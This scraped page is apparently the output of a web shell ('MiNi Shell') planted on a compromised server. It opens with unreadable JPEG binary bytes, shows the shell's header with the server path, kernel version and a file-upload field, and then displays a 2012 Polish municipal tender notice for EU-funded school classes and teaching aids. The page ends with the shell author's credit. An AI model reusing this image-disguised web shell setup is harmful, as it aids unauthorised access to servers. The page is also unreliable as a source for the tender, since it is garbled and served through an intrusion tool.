JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121024/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121024/415232-N-2012.html

<p class="kh_header"><b>Krzyż Wielkopolski: Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu (Rozwój kompetencji kluczowych uczniów SP w Krzyżu Wielkopolskim) w ramach Priorytetu IX, Działanie 9.1, Poddziałanie 9.1.2 Programu Operacyjnego Kapitał Ludzki, realizowane w Szkołach Podstawowych w gminie Krzyż Wielkopolski</b><br>
<b>Numer ogłoszenia: 415232 - 2012; data zamieszczenia: 24.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krzyż Wlkp. , ul. Wojska Polskiego 14, 64-761 Krzyż Wielkopolski, woj. wielkopolskie, tel. 67 2564145, faks 67 2565255.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krzyz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu (Rozwój kompetencji kluczowych uczniów SP w Krzyżu Wielkopolskim) w ramach Priorytetu IX, Działanie 9.1, Poddziałanie 9.1.2 Programu Operacyjnego Kapitał Ludzki, realizowane w Szkołach Podstawowych w gminie Krzyż Wielkopolski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne, obejmujące przeprowadzenie zajęć w ramach projektu - Rozwój kompetencji kluczowych uczniów SP w Krzyżu Wielkopolskim - w szkołach, dla których organem prowadzącym jest Gmina Krzyż Wielkopolski. Ramowy termin wykonania usługi: od dnia podpisania umowy do końca lipca 2014r. - zgodnie z harmonogramem wniosku o dofinansowanie projektu. 
Usługi będą realizowane w następujących szkołach i specjalnościach:
Szkoła Podstawowa w Krzyżu Wielkopolskim :
1) Zajęcia edukacyjne dla dzieci dodatkowe: język angielski: 4 grupy; na grupę przypada do realizacji 60 h zajęć.
2) Zajęcia edukacyjne dla dzieci dodatkowe: dziennikarskie: 1 grupa; na grupę przypada do realizacji 60 h zajęć.
3) Zajęcia edukacyjne dla dzieci dodatkowe: matematyka Mat-talent: 1 grupa; na grupę przypada do realizacji 60 h zajęć.
4) Zajęcia edukacyjne dla dzieci dodatkowe: przyrodnicze: 3 grupy; na grupę przypada do realizacji 60 h zajęć.
5) Zajęcia edukacyjne dla dzieci dodatkowe: informatyka i internet: 6 grup; na grupę przypada do realizacji 60 h zajęć.
6) Zajęcia edukacyjne dla dzieci dodatkowe: koło szaradzisty: 1 grupa; na grupę przypada do realizacji 60 h zajęć.
7) Zajęcia edukacyjne dla dzieci wyrównawcze: język angielski: 1 grupa; na grupę przypada do realizacji 60 h zajęć.
8) Zajęcia edukacyjne dla dzieci wyrównawcze: język polski: 6 grup; na grupę przypada do realizacji 60 h zajęć.
9) Zajęcia edukacyjne dla dzieci wyrównawcze: matematyka: 4 grupy; na grupę przypada do realizacji 60 h zajęć.
10) Zajęcia edukacyjne dla dzieci wyrównawcze: przyrodnicze: 2 grupy; na grupę przypada do realizacji 60 h zajęć.
11) Zajęcia edukacyjne dla dzieci wyrównawcze: korekcyjno-kompensacyjne: 4 grupy; na grupę przypada do realizacji 60 h zajęć.
Razem do realizacji 1980 h w szkole.
Dla każdego z rodzajów zajęć wykonawca wyznaczy minimum jednego nauczyciela!
Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia. Rzeczy te przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych - powinny zatem uwzględniać wiek dzieci z SP; powinny posiadać także odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100% bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. W związku z tym, że w budżecie projektu, w większości przypadków, są one podane z nazwy, Zamawiający na podst. art. 29 ust. 3 podaje ich nazwę własną dodając że można dostarczyć przedmioty równoważne.
Doposażenie SP w Krzyżu Wielkopolskim
1	Corel Draw Graphic Suite X5 PI z nośnikiem	1	Pakiet przeznaczony dla szkolnych pracowni komputerowych na 15+1 stanowisk (15 uczniowskich oraz 1 nauczycielskie); pakiet graficzny. Programu zawiera niezbędne narzędzia do tworzenia grafiki, jej profesjonalnej kreacji i edycji, składania dokumentów oraz tworzenia animacji.
2	Pitagoras	1	Program utrwalający wiedzę uczniów z licencją 10 stanowiskową.
3	Bryły geometryczne składane	1 zestaw	Pomoc dydaktyczna; wielkość dostosowana do wieku uczniów. Z tworzywa sztucznego lub drewna.
4	kalkulator	10	Kalkulator elektroniczny; wyświetlacz mini. 9 cyfrowy.
5	Magnetyczna tabliczka mnożenia	1	Przy pomocy widocznej dla całej klasy tablicy magnetycznej, uczniowie zapoznają się z tabliczką mnożenia i zaczynają samodzielnie rozwiązywać pierwsze zadania.
Na tablicy nadrukowana ma być tabliczka mnożenia do 100.
6	Szkielet brył	1	Zestaw manipulacyjny dla uczniów. Wielość otworów w kulkach ma pozwalać łączyć je ze sobą za pomocą patyczków pod różnymi katami. Dzięki temu można tworzyć nie tylko graniastosłupy i ostrosłupy, lecz także bryły ścięte. Utworzone przez uczniów modele posłużą do omawiania pojęć geometrycznych.
7	Odważniki 	1 	1 zestaw do doświadczeń szkolnych. Metalowe.
8	Kostki godzin i minut	1 zestaw	Kostki do organizowania zabaw dydaktycznych z czasem. Zadaniem gry jest wyliczenie upływu czasu. Kostki wykonane mają być z trwałej pianki, co zapewnia trwałość oraz ciszę podczas pracy.
9	Podwodny świat	1	Program multimedialny.
10	Tajemnicza wiadomość	1	Program multimedialny.
11	Niezwykłe wakacje	1	Program multimedialny.
12	Stare zamczysko	1	Program multimedialny.
13	Tablice matematyczne	1 zestaw	Pomoc dydaktyczna.
14	Działanie na ułamkach dziesiętnych	1	Domino.
15	Dzielenie, mnożenie	2	Domino.
16	Szkło laboratoryjne	1 zestaw	Pomoc dydaktyczna.
17	Zestaw do doświadczeń z magnetyzmu	1 zestaw	Pomoc dydaktyczna.
18	Zestaw ekologiczny do badania wody	1 zestaw	Pomoc dydaktyczna.
19	Zestaw do badania gleby	1	Pomoc dydaktyczna.
20	Przyroda 2.0 kl. IV - VI	1	Plansze interaktywne.
21	Zoologia	1  zestaw	Plansze .
22	Globus	5	Globus geograficzny do zajęć.
23	Edurom Przyroda dla kl. IV - VI	1	Program multimedialny.
24	Preparaty mikroskopowe	1 zestaw	Zawartość preparatów: mucha, ludzkie włosy (naturalny blond i czarne), skrzydełka motyla, ludzka krew, kora drzewa i pióro ptaka.
25	Szkiełka podstawowe	50 sztuk	Pomoc dydaktyczna do mikroskopu biologicznego.
26	Szkiełka nakrywkowe	100 sztuk	Pomoc dydaktyczna do mikroskopu biologicznego.
27	Świat przyrody I	1 zestaw	Plansze .
28	Świat przyrody II	1 zestaw	Plansze .
29	Szkielet człowieka	1	Model podstawowy.
30	Tułów człowieka 	1	Model .
31	Układ krwionośny, nerwowy, oddechowy, pokarmowy	1 zestaw	Pomoc dydaktyczna. 4 Plansze.
32	Duży model do higieny jamy ustnej	1	Pomoc dydaktyczna.
33	Chrońmy nasze środowisko cz. 1 i 2	1	Zestaw 7 plansz.
34	Czas i rytmy przyrody	1	Plansze.
35	Polska krajoznawcza	1	Mapa dwustronna 160x120. Foliowana, oprawiona w wałki drewniane.
36	Układ słoneczny	1	Model przedstawiający Układ Słoneczny. Słońce, planety wraz z księżycami, planetoidy, meteoroidy, komety oraz materia międzyplanetarna (gaz i pył) między nimi.
37	Mały elektryk	1 zestaw	31 elementów (2 podstawki na żarówkę, 2 przełączniki, 1 silniczek elektryczny, 10 przewodów elektrycznych z wtyczkami, 2 podstawy na baterie, 4 łączniki przewodów, 4 podstawy do mocowania układów z pięcioma złączkami, 1 piankowy wiatraczek); instrukcja z schematami eksperymentów.
38	Elektryczność i magnetyzm	1	Pomoc dydaktyczna umożliwia przeprowadzenie co najmniej 36 łatwych eksperymentów, które ułatwiają dzieciom zrozumienie związków pomiędzy siłami magnetycznymi i elektrycznością. Ręcznie napędzany generator wytwarza prąd tylko wtedy, gdy powstanie obwód magnetyczny. Wtedy można eksperymentować z wytwarzaniem światła, wprawianiem w ruch wiatraczka czy przyciąganiem metalowych elementów. Dodatkowe źródło zasilania stanowią baterie. 
39	Ortograffiti	11	Zestaw ćwiczeń.
40	Kamera	1	16 megapikselowy sensor CMOS, 5-krotny zoom optyczny w trybie foto i 15-krotny w trybie video oraz  lampę błyskową; video w jakości Full HD.
41	Dyktafon	1	Dyktafon cyfrowy o pojemności 2 GB z wyjściem słuchawkowym oraz wejściem na mikrofon. Posiada funkcję nagrywanie  odtwarzanie w formacie mp3. Sterowanie głosem z wyborem dużej małej czułości mikrofonu; foldery do przechowywania i porządkowania nagrań.
42	Radiomagnetofon	2	Radioodtwarzacz CD, magnetofon jednokasetowy, radio analogowe, zasilanie sieciowe i na baterię, dźwięk stereo, wyświetlacz LCD, wejście słuchawkowe, waga do 4 kg.
43	Penguin Readers	1 zestaw	Zestaw książeczek do czytania.
44	Grammar Games Elementary	1	Ćwiczenia z j. angielskiego utrwalające struktury gramatyczne i pokazujące, jak stosować je w różnych sytuacjach komunikacyjnych. Logicznie opracowany program nauki gramatyki i dokładne objaśnienia wszystkich ćwiczeń sprawiają, że lekcje są proste w przygotowaniu.
45	Illustrated History of Britain	1	Książka.
46	Illustrated History of the USA	1	Książka.
47	Longman	3	Słownik współczesny.
48	Szarady edukacyjne	1	Książka.
49	Scrabble 	2	Pomoc dydaktyczna.
50	Na Grunwald	1	Gra.
51	Państwa, miasta, rzeka	1	Gra. 
52	Zimna wojna	1	Gra.
53	Flipchart Nobo	1	Flipchart.
54	Ekran projekcyjny AVTek	1	Typ ekranu: Na trójnogu
Wymiary ekranu: min. 1800 x 1800 mm
Wymiary obrazu: min. 1750 x 1750 mm
Format: 1:1
Ramki boczne: min. 25 mm
dół: min. 25 mm
Długość obudowy: min. 1869 mm
Przekrój kasety: min. o65 mm
Rodzaj powierzchni: biała mata..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych, w przypadku zmian zasad projektu wprowadzonych przez Instytucje Zarządzającą Programem Operacyjnym Kapitał Ludzki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonych dokumentów, zgodnie z wymogami SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonych dokumentów, zgodnie z wymogami SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonych dokumentów, zgodnie z wymogami SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonych dokumentów, zgodnie z wymogami SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożonych dokumentów, zgodnie z wymogami SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krzyz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Krzyż Wlkp., ul. Wojska Polskiego 14,  64-761 Krzyż Wlkp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2012 godzina 09:00, miejsce: Gmina Krzyż Wlkp., ul. Wojska Polskiego 14,  64-761 Krzyż Wlkp., sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Rozwój kompetencji kluczowych uczniów SP w Krzyżu Wielkopolskim  w ramach Priorytetu IX, Działanie 9.1, Poddziałanie 9.1.2 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com